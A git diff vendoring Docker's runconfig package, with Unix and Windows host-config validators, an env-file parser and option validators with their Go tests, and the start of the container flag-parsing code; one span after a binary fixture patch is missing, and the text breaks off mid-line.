invalid container format container:") + } + } + + if hc.NetworkMode.IsContainer() && c.Hostname != "" { + return ErrConflictNetworkHostname + } + + if hc.UTSMode.IsHost() && c.Hostname != "" { + return ErrConflictUTSHostname + } + + if hc.NetworkMode.IsHost() && len(hc.Links) > 0 { + return ErrConflictHostNetworkAndLinks + } + + if hc.NetworkMode.IsContainer() && len(hc.Links) > 0 { + return ErrConflictContainerNetworkAndLinks + } + + if hc.NetworkMode.IsContainer() && len(hc.DNS) > 0 { + return ErrConflictNetworkAndDNS + } + + if hc.NetworkMode.IsContainer() && len(hc.ExtraHosts) > 0 { + return ErrConflictNetworkHosts + } + + if (hc.NetworkMode.IsContainer() || hc.NetworkMode.IsHost()) && c.MacAddress != "" { + return ErrConflictContainerNetworkAndMac + } + + if hc.NetworkMode.IsContainer() && (len(hc.PortBindings) > 0 || hc.PublishAllPorts == true) { + return ErrConflictNetworkPublishPorts + } + + if hc.NetworkMode.IsContainer() && len(c.ExposedPorts) > 0 { + return ErrConflictNetworkExposePorts + } + return nil +} + +// ValidateIsolation performs platform specific validation of +// isolation in the hostconfig structure. Linux only supports "default" +// which is LXC container isolation +func ValidateIsolation(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + if !hc.Isolation.IsValid() { + return fmt.Errorf("invalid --isolation: %q - %s only supports 'default'", hc.Isolation, runtime.GOOS) + } + return nil +} + +// ValidateQoS performs platform specific validation of the QoS settings +func ValidateQoS(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + + if hc.IOMaximumBandwidth != 0 { + return fmt.Errorf("invalid QoS settings: %s does not support --io-maxbandwidth", runtime.GOOS) + } + + if hc.IOMaximumIOps != 0 { + return fmt.Errorf("invalid QoS settings: %s does not support --io-maxiops", runtime.GOOS) + } + return nil +} + +// ValidateResources performs platform specific validation of the resource settings +// cpu-rt-runtime and cpu-rt-period can not be greater than their parent, cpu-rt-runtime requires sys_nice +func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + + if hc.Resources.CPURealtimePeriod > 0 && !si.CPURealtimePeriod { + return fmt.Errorf("invalid --cpu-rt-period: Your kernel does not support cgroup rt period") + } + + if hc.Resources.CPURealtimeRuntime > 0 && !si.CPURealtimeRuntime { + return fmt.Errorf("invalid --cpu-rt-runtime: Your kernel does not support cgroup rt runtime") + } + + if hc.Resources.CPURealtimePeriod != 0 && hc.Resources.CPURealtimeRuntime != 0 && hc.Resources.CPURealtimeRuntime > hc.Resources.CPURealtimePeriod { + return fmt.Errorf("invalid --cpu-rt-runtime: rt runtime cannot be higher than rt period") + } + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go new file mode 100644 index 0000000000..91bd6dcc3c --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go @@ -0,0 +1,68 @@ +package runconfig + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/sysinfo" +) + +// DefaultDaemonNetworkMode returns the default network stack the daemon should +// use. +func DefaultDaemonNetworkMode() container.NetworkMode { + return container.NetworkMode("nat") +} + +// IsPreDefinedNetwork indicates if a network is predefined by the daemon +func IsPreDefinedNetwork(network string) bool { + return !container.NetworkMode(network).IsUserDefined() +} + +// ValidateNetMode ensures that the various combinations of requested +// network settings are valid. +func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { + if hc == nil { + return nil + } + parts := strings.Split(string(hc.NetworkMode), ":") + if len(parts) > 1 { + return fmt.Errorf("invalid --net: %s", hc.NetworkMode) + } + return nil +} + +// ValidateIsolation performs platform specific validation of the +// isolation in the hostconfig structure. Windows supports 'default' (or +// blank), 'process', or 'hyperv'. +func ValidateIsolation(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + if !hc.Isolation.IsValid() { + return fmt.Errorf("invalid --isolation: %q. Windows supports 'default', 'process', or 'hyperv'", hc.Isolation) + } + return nil +} + +// ValidateQoS performs platform specific validation of the Qos settings +func ValidateQoS(hc *container.HostConfig) error { + return nil +} + +// ValidateResources performs platform specific validation of the resource settings +func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + + if hc.Resources.CPURealtimePeriod != 0 { + return fmt.Errorf("invalid --cpu-rt-period: Windows does not support this feature") + } + if hc.Resources.CPURealtimeRuntime != 0 { + return fmt.Errorf("invalid --cpu-rt-runtime: Windows does not support this feature") + } + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile.go b/vendor/github.com/docker/docker/runconfig/opts/envfile.go new file mode 100644 index 0000000000..f723799215 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/envfile.go @@ -0,0 +1,81 @@ +package opts + +import ( + "bufio" + "bytes" + "fmt" + "os" + "strings" + "unicode" + "unicode/utf8" +) + +// ParseEnvFile reads a file with environment variables enumerated by lines +// +// ``Environment variable names used by the utilities in the Shell and +// Utilities volume of IEEE Std 1003.1-2001 consist solely of uppercase +// letters, digits, and the '_' (underscore) from the characters defined in +// Portable Character Set and do not begin with a digit. *But*, other +// characters may be permitted by an implementation; applications shall +// tolerate the presence of such names.'' +// -- http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap08.html +// +// As of #16585, it's up to application inside docker to validate or not +// environment variables, that's why we just strip leading whitespace and +// nothing more. +func ParseEnvFile(filename string) ([]string, error) { + fh, err := os.Open(filename) + if err != nil { + return []string{}, err + } + defer fh.Close() + + lines := []string{} + scanner := bufio.NewScanner(fh) + currentLine := 0 + utf8bom := []byte{0xEF, 0xBB, 0xBF} + for scanner.Scan() { + scannedBytes := scanner.Bytes() + if !utf8.Valid(scannedBytes) { + return []string{}, fmt.Errorf("env file %s contains invalid utf8 bytes at line %d: %v", filename, currentLine+1, scannedBytes) + } + // We trim UTF8 BOM + if currentLine == 0 { + scannedBytes = bytes.TrimPrefix(scannedBytes, utf8bom) + } + // trim the line from all leading whitespace first + line := strings.TrimLeftFunc(string(scannedBytes), unicode.IsSpace) + currentLine++ + // line is not empty, and not starting with '#' + if len(line) > 0 && !strings.HasPrefix(line, "#") { + data := strings.SplitN(line, "=", 2) + + // trim the front of a variable, but nothing else + variable := strings.TrimLeft(data[0], whiteSpaces) + if strings.ContainsAny(variable, whiteSpaces) { + return []string{}, ErrBadEnvVariable{fmt.Sprintf("variable '%s' has white spaces", variable)} + } + + if len(data) > 1 { + + // pass the value through, no trimming + lines = append(lines, fmt.Sprintf("%s=%s", variable, data[1])) + } else { + // if only a pass-through variable is given, clean it up. + lines = append(lines, fmt.Sprintf("%s=%s", strings.TrimSpace(line), os.Getenv(line))) + } + } + } + return lines, scanner.Err() +} + +var whiteSpaces = " \t" + +// ErrBadEnvVariable typed error for bad environment variable +type ErrBadEnvVariable struct { + msg string +} + +func (e ErrBadEnvVariable) Error() string { + return fmt.Sprintf("poorly formatted environment: %s", e.msg) +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go b/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go new file mode 100644 index 0000000000..5dd7078bc0 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/envfile_test.go @@ -0,0 +1,142 @@ +package opts + +import ( + "bufio" + "fmt" + "io/ioutil" + "os" + "reflect" + "strings" + "testing" +) + +func tmpFileWithContent(content string, t *testing.T) string { + tmpFile, err := ioutil.TempFile("", "envfile-test") + if err != nil { + t.Fatal(err) + } + defer tmpFile.Close() + + tmpFile.WriteString(content) + return tmpFile.Name() +} + +// Test ParseEnvFile for a file with a few well formatted lines +func TestParseEnvFileGoodFile(t *testing.T) { + content := `foo=bar + baz=quux +# comment + +_foobar=foobaz +with.dots=working +and_underscore=working too +` + // Adding a newline + a line with pure whitespace. + // This is being done like this instead of the block above + // because it's common for editors to trim trailing whitespace + // from lines, which becomes annoying since that's the + // exact thing we need to test. + content += "\n \t " + tmpFile := tmpFileWithContent(content, t) + defer os.Remove(tmpFile) + + lines, err := ParseEnvFile(tmpFile) + if err != nil { + t.Fatal(err) + } + + expectedLines := []string{ + "foo=bar", + "baz=quux", + "_foobar=foobaz", + "with.dots=working", + "and_underscore=working too", + } + + if !reflect.DeepEqual(lines, expectedLines) { + t.Fatal("lines not equal to expected_lines") + } +} + +// Test ParseEnvFile for an empty file +func TestParseEnvFileEmptyFile(t *testing.T) { + tmpFile := tmpFileWithContent("", t) + defer os.Remove(tmpFile) + + lines, err := ParseEnvFile(tmpFile) + if err != nil { + t.Fatal(err) + } + + if len(lines) != 0 { + t.Fatal("lines not empty; expected empty") + } +} + +// Test ParseEnvFile for a non existent file +func TestParseEnvFileNonExistentFile(t *testing.T) { + _, err := ParseEnvFile("foo_bar_baz") + if err == nil { + t.Fatal("ParseEnvFile succeeded; expected failure") + } + if _, ok := err.(*os.PathError); !ok { + t.Fatalf("Expected a PathError, got [%v]", err) + } +} + +// Test ParseEnvFile for a badly formatted file +func TestParseEnvFileBadlyFormattedFile(t *testing.T) { + content := `foo=bar + f =quux +` + + tmpFile := tmpFileWithContent(content, t) + defer os.Remove(tmpFile) + + _, err := ParseEnvFile(tmpFile) + if err == nil { + t.Fatalf("Expected an ErrBadEnvVariable, got nothing") + } + if _, ok := err.(ErrBadEnvVariable); !ok { + t.Fatalf("Expected an ErrBadEnvVariable, got [%v]", err) + } + expectedMessage := "poorly formatted environment: variable 'f ' has white spaces" + if err.Error() != expectedMessage { + t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error()) + } +} + +// Test ParseEnvFile for a file with a line exceeding bufio.MaxScanTokenSize +func TestParseEnvFileLineTooLongFile(t *testing.T) { + content := strings.Repeat("a", bufio.MaxScanTokenSize+42) + content = fmt.Sprint("foo=", content) + + tmpFile := tmpFileWithContent(content, t) + defer os.Remove(tmpFile) + + _, err := ParseEnvFile(tmpFile) + if err == nil { + t.Fatal("ParseEnvFile succeeded; expected failure") + } +} + +// ParseEnvFile with a random file, pass through +func TestParseEnvFileRandomFile(t *testing.T) { + content := `first line +another invalid line` + tmpFile := tmpFileWithContent(content, t) + defer os.Remove(tmpFile) + + _, err := ParseEnvFile(tmpFile) + + if err == nil { + t.Fatalf("Expected an ErrBadEnvVariable, got nothing") + } + if _, ok := err.(ErrBadEnvVariable); !ok { + t.Fatalf("Expected an ErrBadEnvvariable, got [%v]", err) + } + expectedMessage := "poorly formatted environment: variable 'first line' has white spaces" + if err.Error() != expectedMessage { + t.Fatalf("Expected [%v], got [%v]", expectedMessage, err.Error()) + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env b/vendor/github.com/docker/docker/runconfig/opts/fixtures/utf16.env new file mode 100755 index 0000000000000000000000000000000000000000..3a73358fffbc0d5d3d4df985ccf2f4a1a29cdb2a GIT binary patch literal 54 ucmezW&yB$!2yGdh7#tab7 1 { + return val, nil + } + if !doesEnvExist(val) { + return val, nil + } + return fmt.Sprintf("%s=%s", val, os.Getenv(val)), nil +} + +func doesEnvExist(name string) bool { + for _, entry := range os.Environ() { + parts := strings.SplitN(entry, "=", 2) + if runtime.GOOS == "windows" { + // Environment variable are case-insensitive on Windows. PaTh, path and PATH are equivalent. + if strings.EqualFold(parts[0], name) { + return true + } + } + if parts[0] == name { + return true + } + } + return false +} + +// ValidateExtraHost validates that the specified string is a valid extrahost and returns it. +// ExtraHost is in the form of name:ip where the ip has to be a valid ip (IPv4 or IPv6). +func ValidateExtraHost(val string) (string, error) { + // allow for IPv6 addresses in extra hosts by only splitting on first ":" + arr := strings.SplitN(val, ":", 2) + if len(arr) != 2 || len(arr[0]) == 0 { + return "", fmt.Errorf("bad format for add-host: %q", val) + } + if _, err := fopts.ValidateIPAddress(arr[1]); err != nil { + return "", fmt.Errorf("invalid IP address in add-host: %q", arr[1]) + } + return val, nil +} + +// ValidateMACAddress validates a MAC address. +func ValidateMACAddress(val string) (string, error) { + _, err := net.ParseMAC(strings.TrimSpace(val)) + if err != nil { + return "", err + } + return val, nil +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/opts_test.go b/vendor/github.com/docker/docker/runconfig/opts/opts_test.go new file mode 100644 index 0000000000..43f8730fc4 --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/opts_test.go @@ -0,0 +1,113 @@ +package opts + +import ( + "fmt" + "os" + "runtime" + "strings" + "testing" +) + +func TestValidateAttach(t *testing.T) { + valid := []string{ + "stdin", + "stdout", + "stderr", + "STDIN", + "STDOUT", + "STDERR", + } + if _, err := ValidateAttach("invalid"); err == nil { + t.Fatalf("Expected error with [valid streams are STDIN, STDOUT and STDERR], got nothing") + } + + for _, attach := range valid { + value, err := ValidateAttach(attach) + if err != nil { + t.Fatal(err) + } + if value != strings.ToLower(attach) { + t.Fatalf("Expected [%v], got [%v]", attach, value) + } + } +} + +func TestValidateEnv(t *testing.T) { + valids := map[string]string{ + "a": "a", + "something": "something", + "_=a": "_=a", + "env1=value1": "env1=value1", + "_env1=value1": "_env1=value1", + "env2=value2=value3": "env2=value2=value3", + "env3=abc!qwe": "env3=abc!qwe", + "env_4=value 4": "env_4=value 4", + "PATH": fmt.Sprintf("PATH=%v", os.Getenv("PATH")), + "PATH=something": "PATH=something", + "asd!qwe": "asd!qwe", + "1asd": "1asd", + "123": "123", + "some space": "some space", + " some space before": " some space before", + "some space after ": "some space after ", + } + // Environment variables are case in-sensitive on Windows + if runtime.GOOS == "windows" { + valids["PaTh"] = fmt.Sprintf("PaTh=%v", os.Getenv("PATH")) + } + for value, expected := range valids { + actual, err := ValidateEnv(value) + if err != nil { + t.Fatal(err) + } + if actual != expected { + t.Fatalf("Expected [%v], got [%v]", expected, actual) + } + } +} + +func TestValidateExtraHosts(t *testing.T) { + valid := []string{ + `myhost:192.168.0.1`, + `thathost:10.0.2.1`, + `anipv6host:2003:ab34:e::1`, + `ipv6local:::1`, + } + + invalid := map[string]string{ + `myhost:192.notanipaddress.1`: `invalid IP`, + `thathost-nosemicolon10.0.0.1`: `bad format`, + `anipv6host:::::1`: `invalid IP`, + `ipv6local:::0::`: `invalid IP`, + } + + for _, extrahost := range valid { + if _, err := ValidateExtraHost(extrahost); err != nil { + t.Fatalf("ValidateExtraHost(`"+extrahost+"`) should succeed: error %v", err) + } + } + + for extraHost, expectedError := range invalid { + if _, err := ValidateExtraHost(extraHost); err == nil { + t.Fatalf("ValidateExtraHost(`%q`) should have failed validation", extraHost) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("ValidateExtraHost(`%q`) error should contain %q", extraHost, expectedError) + } + } + } +} + +func TestValidateMACAddress(t *testing.T) { + if _, err := ValidateMACAddress(`92:d0:c6:0a:29:33`); err != nil { + t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:29:33`) got %s", err) + } + + if _, err := ValidateMACAddress(`92:d0:c6:0a:33`); err == nil { + t.Fatalf("ValidateMACAddress(`92:d0:c6:0a:33`) succeeded; expected failure on invalid MAC") + } + + if _, err := ValidateMACAddress(`random invalid string`); err == nil { + t.Fatalf("ValidateMACAddress(`random invalid string`) succeeded; expected failure on invalid MAC") + } +} diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse.go b/vendor/github.com/docker/docker/runconfig/opts/parse.go new file mode 100644 index 0000000000..71a89277ec --- /dev/null +++ b/vendor/github.com/docker/docker/runconfig/opts/parse.go @@ -0,0 +1,995 @@ +package opts + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "path" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/signal" + "github.com/docker/go-connections/nat" + units "github.com/docker/go-units" + "github.com/spf13/pflag" +) + +// ContainerOptions is a data object with all the options for creating a container +type ContainerOptions struct { + attach opts.ListOpts + volumes opts.ListOpts + tmpfs opts.ListOpts + blkioWeightDevice WeightdeviceOpt + deviceReadBps ThrottledeviceOpt + deviceWriteBps ThrottledeviceOpt + links opts.ListOpts + aliases opts.ListOpts + linkLocalIPs opts.ListOpts + deviceReadIOps ThrottledeviceOpt + deviceWriteIOps ThrottledeviceOpt + env opts.ListOpts + labels opts.ListOpts + devices opts.ListOpts + ulimits *UlimitOpt + sysctls *opts.MapOpts + publish opts.ListOpts + expose opts.ListOpts + dns opts.ListOpts + dnsSearch opts.ListOpts + dnsOptions opts.ListOpts + extraHosts opts.ListOpts + volumesFrom opts.ListOpts + envFile opts.ListOpts + capAdd opts.ListOpts + capDrop opts.ListOpts + groupAdd opts.ListOpts + securityOpt opts.ListOpts + storageOpt opts.ListOpts + labelsFile opts.ListOpts + loggingOpts opts.ListOpts + privileged bool + pidMode string + utsMode string + usernsMode string + publishAll bool + stdin bool + tty bool + oomKillDisable bool + oomScoreAdj int + containerIDFile string + entrypoint string + hostname string + memoryString string + memoryReservation string + memorySwap string + kernelMemory string + user string + workingDir string + cpuCount int64 + cpuShares int64 + cpuPercent int64 + cpuPeriod int64 + cpuRealtimePeriod int64 + cpuRealtimeRuntime int64 + cpuQuota int64 + cpus opts.NanoCPUs + cpusetCpus string + cpusetMems string + blkioWeight uint16 + ioMaxBandwidth string + ioMaxIOps uint64 + swappiness int64 + netMode string + macAddress string + ipv4Address string + ipv6Address string + ipcMode string + pidsLimit int64 + restartPolicy string + readonlyRootfs bool + loggingDriver string + cgroupParent string + volumeDriver string + stopSignal string + stopTimeout int + isolation string + shmSize string + noHealthcheck bool + healthCmd string + healthInterval time.Duration + healthTimeout time.Duration + healthRetries int + runtime string + autoRemove bool + init bool + initPath string + credentialSpec string + + Image string + Args []string +} + +// AddFlags adds all command line flags that will be used by Parse to the FlagSet +func AddFlags(flags *pflag.FlagSet) *ContainerOptions { + copts := &ContainerOptions{ + aliases: opts.NewListOpts(nil), + attach: opts.NewListOpts(ValidateAttach), + blkioWeightDevice: NewWeightdeviceOpt(ValidateWeightDevice), + capAdd: opts.NewListOpts(nil), + capDrop: opts.NewListOpts(nil), + dns: opts.NewListOpts(opts.ValidateIPAddress), + dnsOptions: opts.NewListOpts(nil), + dnsSearch: opts.NewListOpts(opts.ValidateDNSSearch), + deviceReadBps: NewThrottledeviceOpt(ValidateThrottleBpsDevice), + deviceReadIOps: NewThrottledeviceOpt(ValidateThrottleIOpsDevice), + deviceWriteBps: NewThrottledeviceOpt(ValidateThrottleBpsDevice), + deviceWriteIOps: NewThrottledeviceOpt(ValidateThrottleIOpsDevice), + devices: opts.NewListOpts(ValidateDevice), + env: opts.NewListOpts(ValidateEnv), + envFile: opts.NewListOpts(nil), + expose: opts.NewListOpts(nil), + extraHosts: opts.NewListOpts(ValidateExtraHost), + groupAdd: opts.NewListOpts(nil), + labels: opts.NewListOpts(ValidateEnv), + labelsFile: opts.NewListOpts(nil), + linkLocalIPs: opts.NewListOpts(nil), + links: opts.NewListOpts(ValidateLink), + loggingOpts: opts.NewListOpts(nil), + publish: opts.NewListOpts(nil), + securityOpt: opts.NewListOpts(nil), + storageOpt: opts.NewListOpts(nil), + sysctls: opts.NewMapOpts(nil, opts.ValidateSysctl), + tmpfs: opts.NewListOpts(nil), + ulimits: NewUlimitOpt(nil), + volumes: opts.NewListOpts(nil), + volumesFrom: opts.NewListOpts(nil), + } + + // General purpose flags + flags.VarP(&copts.attach, "attach", "a", "Attach to STDIN, STDOUT or STDERR") + flags.Var(&copts.devices, "device", "Add a host device to the container") + flags.VarP(&copts.env, "env", "e", "Set environment variables") + flags.Var(&copts.envFile, "env-file", "Read in a file of environment variables") + flags.StringVar(&copts.entrypoint, "entrypoint", "", "Overwrite the default ENTRYPOINT of the image") + flags.Var(&copts.groupAdd, "group-add", "Add additional groups to join") + flags.StringVarP(&copts.hostname, "hostname", "h", "", "Container host name") + flags.BoolVarP(&copts.stdin, "interactive", "i", false, "Keep STDIN open even if not attached") + flags.VarP(&copts.labels, "label", "l", "Set meta data on a container") + flags.Var(&copts.labelsFile, "label-file", "Read in a line delimited file of labels") + flags.BoolVar(&copts.readonlyRootfs, "read-only", false, "Mount the container's root filesystem as read only") + flags.StringVar(&copts.restartPolicy, "restart", "no", "Restart policy to apply when a container exits") + flags.StringVar(&copts.stopSignal, "stop-signal", signal.DefaultStopSignal, fmt.Sprintf("Signal to stop a container, %v by default", signal.DefaultStopSignal)) + flags.IntVar(&copts.stopTimeout, "stop-timeout", 0, "Timeout (in seconds) to stop a container") + flags.SetAnnotation("stop-timeout", "version", []string{"1.25"}) + flags.Var(copts.sysctls, "sysctl", "Sysctl options") + flags.BoolVarP(&copts.tty, "tty", "t", false, "Allocate a pseudo-TTY") + flags.Var(copts.ulimits, "ulimit", "Ulimit options") + flags.StringVarP(&copts.user, "user", "u", "", "Username or UID (format: [:])") + flags.StringVarP(&copts.workingDir, "workdir", "w", "", "Working directory inside the container") + flags.BoolVar(&copts.autoRemove, "rm", false, "Automatically remove the container when it exits") + + // Security + flags.Var(&copts.capAdd, "cap-add", "Add Linux capabilities") + flags.Var(&copts.capDrop, "cap-drop", "Drop Linux capabilities") + flags.BoolVar(&copts.privileged, "privileged", false, "Give extended privileges to this container") + flags.Var(&copts.securityOpt, "security-opt", "Security Options") + flags.StringVar(&copts.usernsMode, "userns", "", "User namespace to use") + flags.StringVar(&copts.credentialSpec, "credentialspec", "", "Credential spec for managed service account (Windows only)") + + // Network and port publishing flag + flags.Var(&copts.extraHosts, "add-host", "Add a custom host-to-IP mapping (host:ip)") + flags.Var(&copts.dns, "dns", "Set custom DNS servers") + // We allow for both "--dns-opt" and "--dns-option", although the latter is the recommended way. + // This is to be consistent with service create/update + flags.Var(&copts.dnsOptions, "dns-opt", "Set DNS options") + flags.Var(&copts.dnsOptions, "dns-option", "Set DNS options") + flags.MarkHidden("dns-opt") + flags.Var(&copts.dnsSearch, "dns-search", "Set custom DNS search domains") + flags.Var(&copts.expose, "expose", "Expose a port or a range of ports") + flags.StringVar(&copts.ipv4Address, "ip", "", "Container IPv4 address (e.g. 172.30.100.104)") + flags.StringVar(&copts.ipv6Address, "ip6", "", "Container IPv6 address (e.g. 2001:db8::33)") + flags.Var(&copts.links, "link", "Add link to another container") + flags.Var(&copts.linkLocalIPs, "link-local-ip", "Container IPv4/IPv6 link-local addresses") + flags.StringVar(&copts.macAddress, "mac-address", "", "Container MAC address (e.g. 92:d0:c6:0a:29:33)") + flags.VarP(&copts.publish, "publish", "p", "Publish a container's port(s) to the host") + flags.BoolVarP(&copts.publishAll, "publish-all", "P", false, "Publish all exposed ports to random ports") + // We allow for both "--net" and "--network", although the latter is the recommended way. + flags.StringVar(&copts.netMode, "net", "default", "Connect a container to a network") + flags.StringVar(&copts.netMode, "network", "default", "Connect a container to a network") + flags.MarkHidden("net") + // We allow for both "--net-alias" and "--network-alias", although the latter is the recommended way. + flags.Var(&copts.aliases, "net-alias", "Add network-scoped alias for the container") + flags.Var(&copts.aliases, "network-alias", "Add network-scoped alias for the container") + flags.MarkHidden("net-alias") + + // Logging and storage + flags.StringVar(&copts.loggingDriver, "log-driver", "", "Logging driver for the container") + flags.StringVar(&copts.volumeDriver, "volume-driver", "", "Optional volume driver for the container") + flags.Var(&copts.loggingOpts, "log-opt", "Log driver options") + flags.Var(&copts.storageOpt, "storage-opt", "Storage driver options for the container") + flags.Var(&copts.tmpfs, "tmpfs", "Mount a tmpfs directory") + flags.Var(&copts.volumesFrom, "volumes-from", "Mount volumes from the specified container(s)") + flags.VarP(&copts.volumes, "volume", "v", "Bind mount a volume") + + // Health-checking + flags.StringVar(&copts.healthCmd, "health-cmd", "", "Command to run to check health") + flags.DurationVar(&copts.healthInterval, "health-interval", 0, "Time between running the check (ns|us|ms|s|m|h) (default 0s)") + flags.IntVar(&copts.healthRetries, "health-retries", 0, "Consecutive failures needed to report unhealthy") + flags.DurationVar(&copts.healthTimeout, "health-timeout", 0, "Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s)") + flags.BoolVar(&copts.noHealthcheck, "no-healthcheck", false, "Disable any container-specified HEALTHCHECK") + + // Resource management + flags.Uint16Var(&copts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)") + flags.Var(&copts.blkioWeightDevice, "blkio-weight-device", "Block IO weight (relative device weight)") + flags.StringVar(&copts.containerIDFile, "cidfile", "", "Write the container ID to the file") + flags.StringVar(&copts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") + flags.StringVar(&copts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") + flags.Int64Var(&copts.cpuCount, "cpu-count", 0, "CPU count (Windows only)") + flags.Int64Var(&copts.cpuPercent, "cpu-percent", 0, "CPU percent (Windows only)") + flags.Int64Var(&copts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period") + flags.Int64Var(&copts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota") + flags.Int64Var(&copts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit CPU real-time period in microseconds") + flags.Int64Var(&copts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit CPU real-time runtime in microseconds") + flags.Int64VarP(&copts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") + flags.Var(&copts.cpus, "cpus", "Number of CPUs") + flags.Var(&copts.deviceReadBps, "device-read-bps", "Limit read rate (bytes per second) from a device") + flags.Var(&copts.deviceReadIOps, "device-read-iops", "Limit read rate (IO per second) from a device") + flags.Var(&copts.deviceWriteBps, "device-write-bps", "Limit write rate (bytes per second) to a device") + flags.Var(&copts.deviceWriteIOps, "device-write-iops", "Limit write rate (IO per second) to a device") + flags.StringVar(&copts.ioMaxBandwidth, "io-maxbandwidth", "", "Maximum IO bandwidth limit for the system drive (Windows only)") + flags.Uint64Var(&copts.ioMaxIOps, "io-maxiops", 0, "Maximum IOps limit for the system drive (Windows only)") + flags.StringVar(&copts.kernelMemory, "kernel-memory", "", "Kernel memory limit") + flags.StringVarP(&copts.memoryString, "memory", "m", "", "Memory limit") + flags.StringVar(&copts.memoryReservation, "memory-reservation", "", "Memory soft limit") + flags.StringVar(&copts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") + flags.Int64Var(&copts.swappiness, "memory-swappiness", -1, "Tune container memory swappiness (0 to 100)") + flags.BoolVar(&copts.oomKillDisable, "oom-kill-disable", false, "Disable OOM Killer") + flags.IntVar(&copts.oomScoreAdj, "oom-score-adj", 0, "Tune host's OOM preferences (-1000 to 1000)") + flags.Int64Var(&copts.pidsLimit, "pids-limit", 0, "Tune container pids limit (set -1 for unlimited)") + + // Low-level execution (cgroups, namespaces, ...) + flags.StringVar(&copts.cgroupParent, "cgroup-parent", "", "Optional parent cgroup for the container") + flags.StringVar(&copts.ipcMode, "ipc", "", "IPC namespace to use") + flags.StringVar(&copts.isolation, "isolation", "", "Container isolation technology") + flags.StringVar(&copts.pidMode, "pid", "", "PID namespace to use") + flags.StringVar(&copts.shmSize, "shm-size", "", "Size of /dev/shm, default value is 64MB") + flags.StringVar(&copts.utsMode, "uts", "", "UTS namespace to use") + flags.StringVar(&copts.runtime, "runtime", "", "Runtime to use for this container") + + flags.BoolVar(&copts.init, "init", false, "Run an init inside the container that forwards signals and reaps processes") + flags.StringVar(&copts.initPath, "init-path", "", "Path to the docker-init binary") + return copts +} + +// Parse parses the args for the specified command and generates a Config, +// a HostConfig and returns them with the specified command. +// If the specified args are not valid, it will return an error. +func Parse(flags *pflag.FlagSet, copts *ContainerOptions) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { + var ( + attachStdin = copts.attach.Get("stdin") + attachStdout = copts.attach.Get("stdout") + attachStderr = copts.attach.Get("stderr") + ) + + // Validate the input mac address + if copts.macAddress != "" { + if _, err := ValidateMACAddress(copts.macAddress); err != nil { + return nil, nil, nil, fmt.Errorf("%s is not a valid mac address", copts.macAddress) + } + } + if copts.stdin { + attachStdin = true + } + // If -a is not set, attach to stdout and stderr + if copts.attach.Len() == 0 { + attachStdout = true + attachStderr = true + } + + var err error + + var memory int64 + if copts.memoryString != "" { + memory, err = units.RAMInBytes(copts.memoryString) + if err != nil { + return nil, nil, nil, err + } + } + + var memoryReservation int64 + if copts.memoryReservation != "" { + memoryReservation, err = units.RAMInBytes(copts.memoryReservation) + if err != nil { + return nil, nil, nil, err + } + } + + var memorySwap int64 + if copts.memorySwap != "" { + if copts.memorySwap == "-1" { + memorySwap = -1 + } else { + memorySwap, err = units.RAMInBytes(copts.memorySwap) + if err != nil { + return nil, nil, nil, err + } + } + } + + var kernelMemory int64 + if copts.kernelMemory != "" { + kernelMemory, err = units.RAMInBytes(copts.kernelMemory) + if err != nil { + return nil, nil, nil, err + } + } + + swappiness := copts.swappiness + if swappiness != -1 && (swappiness < 0 || swappiness > 100) { + return nil, nil, nil, fmt.Errorf("invalid value: %d. Valid memory swappiness range is 0-100", swappiness) + } + + var shmSize int64 + if copts.shmSize != "" { + shmSize, err = units.RAMInBytes(copts.shmSize) + if err != nil { + return nil, nil, nil, err + } + } + + // TODO FIXME units.RAMInBytes should have a uint64 version + var maxIOBandwidth int64 + if copts.ioMaxBandwidth != "" { + maxIOBandwidth, err = units.RAMInBytes(copts.ioMaxBandwidth) + if err != nil { + return nil, nil, nil, err + } + if maxIOBandwidth < 0 { + return nil, nil, nil, fmt.Errorf("invalid value: %s. Maximum IO Bandwidth must be positive", 